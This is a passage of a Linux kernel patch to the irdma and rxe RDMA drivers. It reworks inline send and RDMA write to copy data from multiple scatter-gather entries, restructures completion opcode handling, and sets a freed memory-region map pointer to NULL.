+@@ -566,21 +566,37 @@ static void irdma_set_mw_bind_wqe_gen_1(__le64 *wqe,
+ 
+ /**
+  * irdma_copy_inline_data_gen_1 - Copy inline data to wqe
+- * @dest: pointer to wqe
+- * @src: pointer to inline data
+- * @len: length of inline data to copy
++ * @wqe: pointer to wqe
++ * @sge_list: table of pointers to inline data
++ * @num_sges: Total inline data length
+  * @polarity: compatibility parameter
+  */
+-static void irdma_copy_inline_data_gen_1(u8 *dest, u8 *src, u32 len,
+-					 u8 polarity)
++static void irdma_copy_inline_data_gen_1(u8 *wqe, struct ib_sge *sge_list,
++					 u32 num_sges, u8 polarity)
+ {
+-	if (len <= 16) {
+-		memcpy(dest, src, len);
+-	} else {
+-		memcpy(dest, src, 16);
+-		src += 16;
+-		dest = dest + 32;
+-		memcpy(dest, src, len - 16);
++	u32 quanta_bytes_remaining = 16;
++	int i;
++
++	for (i = 0; i < num_sges; i++) {
++		u8 *cur_sge = (u8 *)(uintptr_t)sge_list[i].addr;
++		u32 sge_len = sge_list[i].length;
++
++		while (sge_len) {
++			u32 bytes_copied;
++
++			bytes_copied = min(sge_len, quanta_bytes_remaining);
++			memcpy(wqe, cur_sge, bytes_copied);
++			wqe += bytes_copied;
++			cur_sge += bytes_copied;
++			quanta_bytes_remaining -= bytes_copied;
++			sge_len -= bytes_copied;
++
++			if (!quanta_bytes_remaining) {
++				/* Remaining inline bytes reside after hdr */
++				wqe += 16;
++				quanta_bytes_remaining = 32;
++			}
++		}
+ 	}
+ }
+ 
+@@ -612,35 +628,51 @@ static void irdma_set_mw_bind_wqe(__le64 *wqe,
+ 
+ /**
+  * irdma_copy_inline_data - Copy inline data to wqe
+- * @dest: pointer to wqe
+- * @src: pointer to inline data
+- * @len: length of inline data to copy
++ * @wqe: pointer to wqe
++ * @sge_list: table of pointers to inline data
++ * @num_sges: number of SGE's
+  * @polarity: polarity of wqe valid bit
+  */
+-static void irdma_copy_inline_data(u8 *dest, u8 *src, u32 len, u8 polarity)
++static void irdma_copy_inline_data(u8 *wqe, struct ib_sge *sge_list,
++				   u32 num_sges, u8 polarity)
+ {
+ 	u8 inline_valid = polarity << IRDMA_INLINE_VALID_S;
+-	u32 copy_size;
+-
+-	dest += 8;
+-	if (len <= 8) {
+-		memcpy(dest, src, len);
+-		return;
+-	}
+-
+-	*((u64 *)dest) = *((u64 *)src);
+-	len -= 8;
+-	src += 8;
+-	dest += 24; /* point to additional 32 byte quanta */
+-
+-	while (len) {
+-		copy_size = len < 31 ? len : 31;
+-		memcpy(dest, src, copy_size);
+-		*(dest + 31) = inline_valid;
+-		len -= copy_size;
+-		dest += 32;
+-		src += copy_size;
++	u32 quanta_bytes_remaining = 8;
++	bool first_quanta = true;
++	int i;
++
++	wqe += 8;
++
++	for (i = 0; i < num_sges; i++) {
++		u8 *cur_sge = (u8 *)(uintptr_t)sge_list[i].addr;
++		u32 sge_len = sge_list[i].length;
++
++		while (sge_len) {
++			u32 bytes_copied;
++
++			bytes_copied = min(sge_len, quanta_bytes_remaining);
++			memcpy(wqe, cur_sge, bytes_copied);
++			wqe += bytes_copied;
++			cur_sge += bytes_copied;
++			quanta_bytes_remaining -= bytes_copied;
++			sge_len -= bytes_copied;
++
++			if (!quanta_bytes_remaining) {
++				quanta_bytes_remaining = 31;
++
++				/* Remaining inline bytes reside after hdr */
++				if (first_quanta) {
++					first_quanta = false;
++					wqe += 16;
++				} else {
++					*wqe = inline_valid;
++					wqe++;
++				}
++			}
++		}
+ 	}
++	if (!first_quanta && quanta_bytes_remaining < 31)
++		*(wqe + quanta_bytes_remaining) = inline_valid;
+ }
+ 
+ /**
+@@ -679,20 +711,27 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 			       struct irdma_post_sq_info *info, bool post_sq)
+ {
+ 	__le64 *wqe;
+-	struct irdma_inline_rdma_write *op_info;
++	struct irdma_rdma_write *op_info;
+ 	u64 hdr = 0;
+ 	u32 wqe_idx;
+ 	bool read_fence = false;
++	u32 i, total_size = 0;
+ 	u16 quanta;
+ 
+ 	info->push_wqe = qp->push_db ? true : false;
+-	op_info = &info->op.inline_rdma_write;
++	op_info = &info->op.rdma_write;
++
++	if (unlikely(qp->max_sq_frag_cnt < op_info->num_lo_sges))
++		return -EINVAL;
++
++	for (i = 0; i < op_info->num_lo_sges; i++)
++		total_size += op_info->lo_sg_list[i].length;
+ 
+-	if (op_info->len > qp->max_inline_data)
++	if (unlikely(total_size > qp->max_inline_data))
+ 		return -EINVAL;
+ 
+-	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(op_info->len);
+-	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, op_info->len,
++	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(total_size);
++	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, total_size,
+ 					 info);
+ 	if (!wqe)
+ 		return -ENOMEM;
+@@ -705,7 +744,7 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 
+ 	hdr = FIELD_PREP(IRDMAQPSQ_REMSTAG, op_info->rem_addr.lkey) |
+ 	      FIELD_PREP(IRDMAQPSQ_OPCODE, info->op_type) |
+-	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, op_info->len) |
++	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, total_size) |
+ 	      FIELD_PREP(IRDMAQPSQ_REPORTRTT, info->report_rtt ? 1 : 0) |
+ 	      FIELD_PREP(IRDMAQPSQ_INLINEDATAFLAG, 1) |
+ 	      FIELD_PREP(IRDMAQPSQ_IMMDATAFLAG, info->imm_data_valid ? 1 : 0) |
+@@ -719,7 +758,8 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 		set_64bit_val(wqe, 0,
+ 			      FIELD_PREP(IRDMAQPSQ_IMMDATA, info->imm_data));
+ 
+-	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->data, op_info->len,
++	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->lo_sg_list,
++					op_info->num_lo_sges,
+ 					qp->swqe_polarity);
+ 	dma_wmb(); /* make sure WQE is populated before valid bit is set */
+ 
+@@ -745,20 +785,27 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 			 struct irdma_post_sq_info *info, bool post_sq)
+ {
+ 	__le64 *wqe;
+-	struct irdma_post_inline_send *op_info;
++	struct irdma_post_send *op_info;
+ 	u64 hdr;
+ 	u32 wqe_idx;
+ 	bool read_fence = false;
++	u32 i, total_size = 0;
+ 	u16 quanta;
+ 
+ 	info->push_wqe = qp->push_db ? true : false;
+-	op_info = &info->op.inline_send;
++	op_info = &info->op.send;
++
++	if (unlikely(qp->max_sq_frag_cnt < op_info->num_sges))
++		return -EINVAL;
+ 
+-	if (op_info->len > qp->max_inline_data)
++	for (i = 0; i < op_info->num_sges; i++)
++		total_size += op_info->sg_list[i].length;
++
++	if (unlikely(total_size > qp->max_inline_data))
+ 		return -EINVAL;
+ 
+-	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(op_info->len);
+-	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, op_info->len,
++	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(total_size);
++	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, total_size,
+ 					 info);
+ 	if (!wqe)
+ 		return -ENOMEM;
+@@ -773,7 +820,7 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 	hdr = FIELD_PREP(IRDMAQPSQ_REMSTAG, info->stag_to_inv) |
+ 	      FIELD_PREP(IRDMAQPSQ_AHID, op_info->ah_id) |
+ 	      FIELD_PREP(IRDMAQPSQ_OPCODE, info->op_type) |
+-	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, op_info->len) |
++	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, total_size) |
+ 	      FIELD_PREP(IRDMAQPSQ_IMMDATAFLAG,
+ 			 (info->imm_data_valid ? 1 : 0)) |
+ 	      FIELD_PREP(IRDMAQPSQ_REPORTRTT, (info->report_rtt ? 1 : 0)) |
+@@ -789,8 +836,8 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 	if (info->imm_data_valid)
+ 		set_64bit_val(wqe, 0,
+ 			      FIELD_PREP(IRDMAQPSQ_IMMDATA, info->imm_data));
+-	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->data, op_info->len,
+-					qp->swqe_polarity);
++	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->sg_list,
++					op_info->num_sges, qp->swqe_polarity);
+ 
+ 	dma_wmb(); /* make sure WQE is populated before valid bit is set */
+ 
+@@ -1002,11 +1049,10 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	__le64 *cqe;
+ 	struct irdma_qp_uk *qp;
+ 	struct irdma_ring *pring = NULL;
+-	u32 wqe_idx, q_type;
++	u32 wqe_idx;
+ 	int ret_code;
+ 	bool move_cq_head = true;
+ 	u8 polarity;
+-	u8 op_type;
+ 	bool ext_valid;
+ 	__le64 *ext_cqe;
+ 
+@@ -1074,7 +1120,7 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 		info->ud_vlan_valid = false;
+ 	}
+ 
+-	q_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
++	info->q_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
+ 	info->error = (bool)FIELD_GET(IRDMA_CQ_ERROR, qword3);
+ 	info->push_dropped = (bool)FIELD_GET(IRDMACQ_PSHDROP, qword3);
+ 	info->ipv4 = (bool)FIELD_GET(IRDMACQ_IPV4, qword3);
+@@ -1113,8 +1159,9 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	}
+ 	wqe_idx = (u32)FIELD_GET(IRDMA_CQ_WQEIDX, qword3);
+ 	info->qp_handle = (irdma_qp_handle)(unsigned long)qp;
++	info->op_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
+ 
+-	if (q_type == IRDMA_CQE_QTYPE_RQ) {
++	if (info->q_type == IRDMA_CQE_QTYPE_RQ) {
+ 		u32 array_idx;
+ 
+ 		array_idx = wqe_idx / qp->rq_wqe_size_multiplier;
+@@ -1134,10 +1181,6 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 
+ 		info->bytes_xfered = (u32)FIELD_GET(IRDMACQ_PAYLDLEN, qword0);
+ 
+-		if (info->imm_valid)
+-			info->op_type = IRDMA_OP_TYPE_REC_IMM;
+-		else
+-			info->op_type = IRDMA_OP_TYPE_REC;
+ 		if (qword3 & IRDMACQ_STAG) {
+ 			info->stag_invalid_set = true;
+ 			info->inv_stag = (u32)FIELD_GET(IRDMACQ_INVSTAG, qword2);
+@@ -1195,17 +1238,18 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 				sw_wqe = qp->sq_base[tail].elem;
+ 				get_64bit_val(sw_wqe, 24,
+ 					      &wqe_qword);
+-				op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE, wqe_qword);
+-				info->op_type = op_type;
++				info->op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE,
++							      wqe_qword);
+ 				IRDMA_RING_SET_TAIL(qp->sq_ring,
+ 						    tail + qp->sq_wrtrk_array[tail].quanta);
+-				if (op_type != IRDMAQP_OP_NOP) {
++				if (info->op_type != IRDMAQP_OP_NOP) {
+ 					info->wr_id = qp->sq_wrtrk_array[tail].wrid;
+ 					info->bytes_xfered = qp->sq_wrtrk_array[tail].wr_len;
+ 					break;
+ 				}
+ 			} while (1);
+-			if (op_type == IRDMA_OP_TYPE_BIND_MW && info->minor_err == FLUSH_PROT_ERR)
++			if (info->op_type == IRDMA_OP_TYPE_BIND_MW &&
++			    info->minor_err == FLUSH_PROT_ERR)
+ 				info->minor_err = FLUSH_MW_BIND_ERR;
+ 			qp->sq_flush_seen = true;
+ 			if (!IRDMA_RING_MORE_WORK(qp->sq_ring))
+diff --git a/drivers/infiniband/hw/irdma/user.h b/drivers/infiniband/hw/irdma/user.h
+index 2ef61923c9268..d0cdf609f5e06 100644
+--- a/drivers/infiniband/hw/irdma/user.h
++++ b/drivers/infiniband/hw/irdma/user.h
+@@ -173,14 +173,6 @@ struct irdma_post_send {
+ 	u32 ah_id;
+ };
+ 
+-struct irdma_post_inline_send {
+-	void *data;
+-	u32 len;
+-	u32 qkey;
+-	u32 dest_qp;
+-	u32 ah_id;
+-};
+-
+ struct irdma_post_rq_info {
+ 	u64 wr_id;
+ 	struct ib_sge *sg_list;
+@@ -193,12 +185,6 @@ struct irdma_rdma_write {
+ 	struct ib_sge rem_addr;
+ };
+ 
+-struct irdma_inline_rdma_write {
+-	void *data;
+-	u32 len;
+-	struct ib_sge rem_addr;
+-};
+-
+ struct irdma_rdma_read {
+ 	struct ib_sge *lo_sg_list;
+ 	u32 num_lo_sges;
+@@ -241,8 +227,6 @@ struct irdma_post_sq_info {
+ 		struct irdma_rdma_read rdma_read;
+ 		struct irdma_bind_window bind_window;
+ 		struct irdma_inv_local_stag inv_local_stag;
+-		struct irdma_inline_rdma_write inline_rdma_write;
+-		struct irdma_post_inline_send inline_send;
+ 	} op;
+ };
+ 
+@@ -261,6 +245,7 @@ struct irdma_cq_poll_info {
+ 	u16 ud_vlan;
+ 	u8 ud_smac[6];
+ 	u8 op_type;
++	u8 q_type;
+ 	bool stag_invalid_set:1; /* or L_R_Key set */
+ 	bool push_dropped:1;
+ 	bool error:1;
+@@ -291,7 +276,8 @@ int irdma_uk_stag_local_invalidate(struct irdma_qp_uk *qp,
+ 				   bool post_sq);
+ 
+ struct irdma_wqe_uk_ops {
+-	void (*iw_copy_inline_data)(u8 *dest, u8 *src, u32 len, u8 polarity);
++	void (*iw_copy_inline_data)(u8 *dest, struct ib_sge *sge_list,
++				    u32 num_sges, u8 polarity);
+ 	u16 (*iw_inline_data_size_to_quanta)(u32 data_size);
+ 	void (*iw_set_fragment)(__le64 *wqe, u32 offset, struct ib_sge *sge,
+ 				u8 valid);
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 8dfc9e154d733..445e69e864097 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2591,6 +2591,7 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			sw_wqe = qp->sq_base[wqe_idx].elem;
+ 			get_64bit_val(sw_wqe, 24, &wqe_qword);
+ 			cmpl->cpi.op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE, IRDMAQPSQ_OPCODE);
++			cmpl->cpi.q_type = IRDMA_CQE_QTYPE_SQ;
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+@@ -2629,6 +2630,7 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 
+ 			cmpl->cpi.wr_id = qp->rq_wrid_array[wqe_idx];
+ 			cmpl->cpi.op_type = IRDMA_OP_TYPE_REC;
++			cmpl->cpi.q_type = IRDMA_CQE_QTYPE_RQ;
+ 			/* remove the RQ WR by moving RQ tail */
+ 			IRDMA_RING_SET_TAIL(*rq_ring, rq_ring->tail + 1);
+ 			ibdev_dbg(iwqp->iwrcq->ibcq.device,
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index a22afbb25bc58..f6973ea55eda7 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -63,36 +63,6 @@ static int irdma_query_device(struct ib_device *ibdev,
+ 	return 0;
+ }
+ 
+-/**
+- * irdma_get_eth_speed_and_width - Get IB port speed and width from netdev speed
+- * @link_speed: netdev phy link speed
+- * @active_speed: IB port speed
+- * @active_width: IB port width
+- */
+-static void irdma_get_eth_speed_and_width(u32 link_speed, u16 *active_speed,
+-					  u8 *active_width)
+-{
+-	if (link_speed <= SPEED_1000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_SDR;
+-	} else if (link_speed <= SPEED_10000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_FDR10;
+-	} else if (link_speed <= SPEED_20000) {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_DDR;
+-	} else if (link_speed <= SPEED_25000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_EDR;
+-	} else if (link_speed <= SPEED_40000) {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_FDR10;
+-	} else {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_EDR;
+-	}
+-}
+-
+ /**
+  * irdma_query_port - get port attributes
+  * @ibdev: device pointer from stack
+@@ -120,8 +90,9 @@ static int irdma_query_port(struct ib_device *ibdev, u32 port,
+ 		props->state = IB_PORT_DOWN;
+ 		props->phys_state = IB_PORT_PHYS_STATE_DISABLED;
+ 	}
+-	irdma_get_eth_speed_and_width(SPEED_100000, &props->active_speed,
+-				      &props->active_width);
++
++	ib_get_eth_speed(ibdev, port, &props->active_speed,
++			 &props->active_width);
+ 
+ 	if (rdma_protocol_roce(ibdev, 1)) {
+ 		props->gid_tbl_len = 32;
+@@ -1242,6 +1213,7 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		av->attrs = attr->ah_attr;
+ 		rdma_gid2ip((struct sockaddr *)&av->sgid_addr, &sgid_attr->gid);
+ 		rdma_gid2ip((struct sockaddr *)&av->dgid_addr, &attr->ah_attr.grh.dgid);
++		av->net_type = rdma_gid_attr_network_type(sgid_attr);
+ 		if (av->net_type == RDMA_NETWORK_IPV6) {
+ 			__be32 *daddr =
+ 				av->dgid_addr.saddr_in6.sin6_addr.in6_u.u6_addr32;
+@@ -2358,9 +2330,10 @@ static bool irdma_check_mr_contiguous(struct irdma_pble_alloc *palloc,
+  * @rf: RDMA PCI function
+  * @iwmr: mr pointer for this memory registration
+  * @use_pbles: flag if to use pble's
++ * @lvl_1_only: request only level 1 pble if true
+  */
+ static int irdma_setup_pbles(struct irdma_pci_f *rf, struct irdma_mr *iwmr,
+-			     bool use_pbles)
++			     bool use_pbles, bool lvl_1_only)
+ {
+ 	struct irdma_pbl *iwpbl = &iwmr->iwpbl;
+ 	struct irdma_pble_alloc *palloc = &iwpbl->pble_alloc;
+@@ -2371,7 +2344,7 @@ static int irdma_setup_pbles(struct irdma_pci_f *rf, struct irdma_mr *iwmr,
+ 
+ 	if (use_pbles) {
+ 		status = irdma_get_pble(rf->pble_rsrc, palloc, iwmr->page_cnt,
+-					false);
++					lvl_1_only);
+ 		if (status)
+ 			return status;
+ 
+@@ -2414,16 +2387,10 @@ static int irdma_handle_q_mem(struct irdma_device *iwdev,
+ 	bool ret = true;
+ 
+ 	pg_size = iwmr->page_size;
+-	err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles);
++	err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles, true);
+ 	if (err)
+ 		return err;
+ 
+-	if (use_pbles && palloc->level != PBLE_LEVEL_1) {
+-		irdma_free_pble(iwdev->rf->pble_rsrc, palloc);
+-		iwpbl->pbl_allocated = false;
+-		return -ENOMEM;
+-	}
+-
+ 	if (use_pbles)
+ 		arr = palloc->level1.addr;
+ 
+@@ -2899,7 +2866,7 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 	case IRDMA_MEMREG_TYPE_MEM:
+ 		use_pbles = (iwmr->page_cnt != 1);
+ 
+-		err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles);
++		err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles, false);
+ 		if (err)
+ 			goto error;
+ 
+@@ -3165,30 +3132,20 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 				info.stag_to_inv = ib_wr->ex.invalidate_rkey;
+ 			}
+ 
+-			if (ib_wr->send_flags & IB_SEND_INLINE) {
+-				info.op.inline_send.data = (void *)(unsigned long)
+-							   ib_wr->sg_list[0].addr;
+-				info.op.inline_send.len = ib_wr->sg_list[0].length;
+-				if (iwqp->ibqp.qp_type == IB_QPT_UD ||
+-				    iwqp->ibqp.qp_type == IB_QPT_GSI) {
+-					ah = to_iwah(ud_wr(ib_wr)->ah);
+-					info.op.inline_send.ah_id = ah->sc_ah.ah_info.ah_idx;
+-					info.op.inline_send.qkey = ud_wr(ib_wr)->remote_qkey;
+-					info.op.inline_send.dest_qp = ud_wr(ib_wr)->remote_qpn;
+-				}
++			info.op.send.num_sges = ib_wr->num_sge;
++			info.op.send.sg_list = ib_wr->sg_list;
++			if (iwqp->ibqp.qp_type == IB_QPT_UD ||
++			    iwqp->ibqp.qp_type == IB_QPT_GSI) {
++				ah = to_iwah(ud_wr(ib_wr)->ah);
++				info.op.send.ah_id = ah->sc_ah.ah_info.ah_idx;
++				info.op.send.qkey = ud_wr(ib_wr)->remote_qkey;
++				info.op.send.dest_qp = ud_wr(ib_wr)->remote_qpn;
++			}
++
++			if (ib_wr->send_flags & IB_SEND_INLINE)
+ 				err = irdma_uk_inline_send(ukqp, &info, false);
+-			} else {
+-				info.op.send.num_sges = ib_wr->num_sge;
+-				info.op.send.sg_list = ib_wr->sg_list;
+-				if (iwqp->ibqp.qp_type == IB_QPT_UD ||
+-				    iwqp->ibqp.qp_type == IB_QPT_GSI) {
+-					ah = to_iwah(ud_wr(ib_wr)->ah);
+-					info.op.send.ah_id = ah->sc_ah.ah_info.ah_idx;
+-					info.op.send.qkey = ud_wr(ib_wr)->remote_qkey;
+-					info.op.send.dest_qp = ud_wr(ib_wr)->remote_qpn;
+-				}
++			else
+ 				err = irdma_uk_send(ukqp, &info, false);
+-			}
+ 			break;
+ 		case IB_WR_RDMA_WRITE_WITH_IMM:
+ 			if (ukqp->qp_caps & IRDMA_WRITE_WITH_IMM) {
+@@ -3205,22 +3162,15 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 			else
+ 				info.op_type = IRDMA_OP_TYPE_RDMA_WRITE;
+ 
+-			if (ib_wr->send_flags & IB_SEND_INLINE) {
+-				info.op.inline_rdma_write.data = (void *)(uintptr_t)ib_wr->sg_list[0].addr;
+-				info.op.inline_rdma_write.len =
+-						ib_wr->sg_list[0].length;
+-				info.op.inline_rdma_write.rem_addr.addr =
+-						rdma_wr(ib_wr)->remote_addr;
+-				info.op.inline_rdma_write.rem_addr.lkey =
+-						rdma_wr(ib_wr)->rkey;
++			info.op.rdma_write.num_lo_sges = ib_wr->num_sge;
++			info.op.rdma_write.lo_sg_list = ib_wr->sg_list;
++			info.op.rdma_write.rem_addr.addr =
++				rdma_wr(ib_wr)->remote_addr;
++			info.op.rdma_write.rem_addr.lkey = rdma_wr(ib_wr)->rkey;
++			if (ib_wr->send_flags & IB_SEND_INLINE)
+ 				err = irdma_uk_inline_rdma_write(ukqp, &info, false);
+-			} else {
+-				info.op.rdma_write.lo_sg_list = (void *)ib_wr->sg_list;
+-				info.op.rdma_write.num_lo_sges = ib_wr->num_sge;
+-				info.op.rdma_write.rem_addr.addr = rdma_wr(ib_wr)->remote_addr;
+-				info.op.rdma_write.rem_addr.lkey = rdma_wr(ib_wr)->rkey;
++			else
+ 				err = irdma_uk_rdma_write(ukqp, &info, false);
+-			}
+ 			break;
+ 		case IB_WR_RDMA_READ_WITH_INV:
+ 			inv_stag = true;
+@@ -3380,7 +3330,6 @@ static enum ib_wc_status irdma_flush_err_to_ib_wc_status(enum irdma_flush_opcode
+ static void irdma_process_cqe(struct ib_wc *entry,
+ 			      struct irdma_cq_poll_info *cq_poll_info)
+ {
+-	struct irdma_qp *iwqp;
+ 	struct irdma_sc_qp *qp;
+ 
+ 	entry->wc_flags = 0;
+@@ -3388,7 +3337,6 @@ static void irdma_process_cqe(struct ib_wc *entry,
+ 	entry->wr_id = cq_poll_info->wr_id;
+ 
+ 	qp = cq_poll_info->qp_handle;
+-	iwqp = qp->qp_uk.back_qp;
+ 	entry->qp = qp->qp_uk.back_qp;
+ 
+ 	if (cq_poll_info->error) {
+@@ -3421,42 +3369,17 @@ static void irdma_process_cqe(struct ib_wc *entry,
+ 		}
+ 	}
+ 
+-	switch (cq_poll_info->op_type) {
+-	case IRDMA_OP_TYPE_RDMA_WRITE:
+-	case IRDMA_OP_TYPE_RDMA_WRITE_SOL:
+-		entry->opcode = IB_WC_RDMA_WRITE;
+-		break;
+-	case IRDMA_OP_TYPE_RDMA_READ_INV_STAG:
+-	case IRDMA_OP_TYPE_RDMA_READ:
+-		entry->opcode = IB_WC_RDMA_READ;
+-		break;
+-	case IRDMA_OP_TYPE_SEND_INV:
+-	case IRDMA_OP_TYPE_SEND_SOL:
+-	case IRDMA_OP_TYPE_SEND_SOL_INV:
+-	case IRDMA_OP_TYPE_SEND:
+-		entry->opcode = IB_WC_SEND;
+-		break;
+-	case IRDMA_OP_TYPE_FAST_REG_NSMR:
+-		entry->opcode = IB_WC_REG_MR;
+-		break;
+-	case IRDMA_OP_TYPE_INV_STAG:
+-		entry->opcode = IB_WC_LOCAL_INV;
+-		break;
+-	case IRDMA_OP_TYPE_REC_IMM:
+-	case IRDMA_OP_TYPE_REC:
+-		entry->opcode = cq_poll_info->op_type == IRDMA_OP_TYPE_REC_IMM ?
+-			IB_WC_RECV_RDMA_WITH_IMM : IB_WC_RECV;
++	if (cq_poll_info->q_type == IRDMA_CQE_QTYPE_SQ) {
++		set_ib_wc_op_sq(cq_poll_info, entry);
++	} else {
++		set_ib_wc_op_rq(cq_poll_info, entry,
++				qp->qp_uk.qp_caps & IRDMA_SEND_WITH_IMM ?
++				true : false);
+ 		if (qp->qp_uk.qp_type != IRDMA_QP_TYPE_ROCE_UD &&
+ 		    cq_poll_info->stag_invalid_set) {
+ 			entry->ex.invalidate_rkey = cq_poll_info->inv_stag;
+ 			entry->wc_flags |= IB_WC_WITH_INVALIDATE;
+ 		}
+-		break;
+-	default:
+-		ibdev_err(&iwqp->iwdev->ibdev,
+-			  "Invalid opcode = %d in CQE\n", cq_poll_info->op_type);
+-		entry->status = IB_WC_GENERAL_ERR;
+-		return;
+ 	}
+ 
+ 	if (qp->qp_uk.qp_type == IRDMA_QP_TYPE_ROCE_UD) {
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index 4309b7159f42c..a536e9fa85ebf 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -232,6 +232,59 @@ static inline u16 irdma_fw_minor_ver(struct irdma_sc_dev *dev)
+ 	return (u16)FIELD_GET(IRDMA_FW_VER_MINOR, dev->feature_info[IRDMA_FEATURE_FW_INFO]);
+ }
+ 
++static inline void set_ib_wc_op_sq(struct irdma_cq_poll_info *cq_poll_info,
++				   struct ib_wc *entry)
++{
++	switch (cq_poll_info->op_type) {
++	case IRDMA_OP_TYPE_RDMA_WRITE:
++	case IRDMA_OP_TYPE_RDMA_WRITE_SOL:
++		entry->opcode = IB_WC_RDMA_WRITE;
++		break;
++	case IRDMA_OP_TYPE_RDMA_READ_INV_STAG:
++	case IRDMA_OP_TYPE_RDMA_READ:
++		entry->opcode = IB_WC_RDMA_READ;
++		break;
++	case IRDMA_OP_TYPE_SEND_SOL:
++	case IRDMA_OP_TYPE_SEND_SOL_INV:
++	case IRDMA_OP_TYPE_SEND_INV:
++	case IRDMA_OP_TYPE_SEND:
++		entry->opcode = IB_WC_SEND;
++		break;
++	case IRDMA_OP_TYPE_FAST_REG_NSMR:
++		entry->opcode = IB_WC_REG_MR;
++		break;
++	case IRDMA_OP_TYPE_INV_STAG:
++		entry->opcode = IB_WC_LOCAL_INV;
++		break;
++	default:
++		entry->status = IB_WC_GENERAL_ERR;
++	}
++}
++
++static inline void set_ib_wc_op_rq(struct irdma_cq_poll_info *cq_poll_info,
++				   struct ib_wc *entry, bool send_imm_support)
++{
++	/**
++	 * iWARP does not support sendImm, so the presence of Imm data
++	 * must be WriteImm.
++	 */
++	if (!send_imm_support) {
++		entry->opcode = cq_poll_info->imm_valid ?
++					IB_WC_RECV_RDMA_WITH_IMM :
++					IB_WC_RECV;
++		return;
++	}
++
++	switch (cq_poll_info->op_type) {
++	case IB_OPCODE_RDMA_WRITE_ONLY_WITH_IMMEDIATE:
++	case IB_OPCODE_RDMA_WRITE_LAST_WITH_IMMEDIATE:
++		entry->opcode = IB_WC_RECV_RDMA_WITH_IMM;
++		break;
++	default:
++		entry->opcode = IB_WC_RECV;
++	}
++}
++
+ void irdma_mcast_mac(u32 *ip_addr, u8 *mac, bool ipv4);
+ int irdma_ib_register_device(struct irdma_device *iwdev);
+ void irdma_ib_unregister_device(struct irdma_device *iwdev);
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 502e9ada99b30..80e2d631fdb24 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -99,6 +99,7 @@ err2:
+ 		kfree(mr->map[i]);
+ 
+ 	kfree(mr->map);
++	mr->map = NULL;
+ err1:
+ 	return -ENOMEM;
+ }
+@@ -122,7 +123,6 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 	int			num_buf;
+ 	void			*vaddr;
+ 	int err;
+-	int i;
+ 
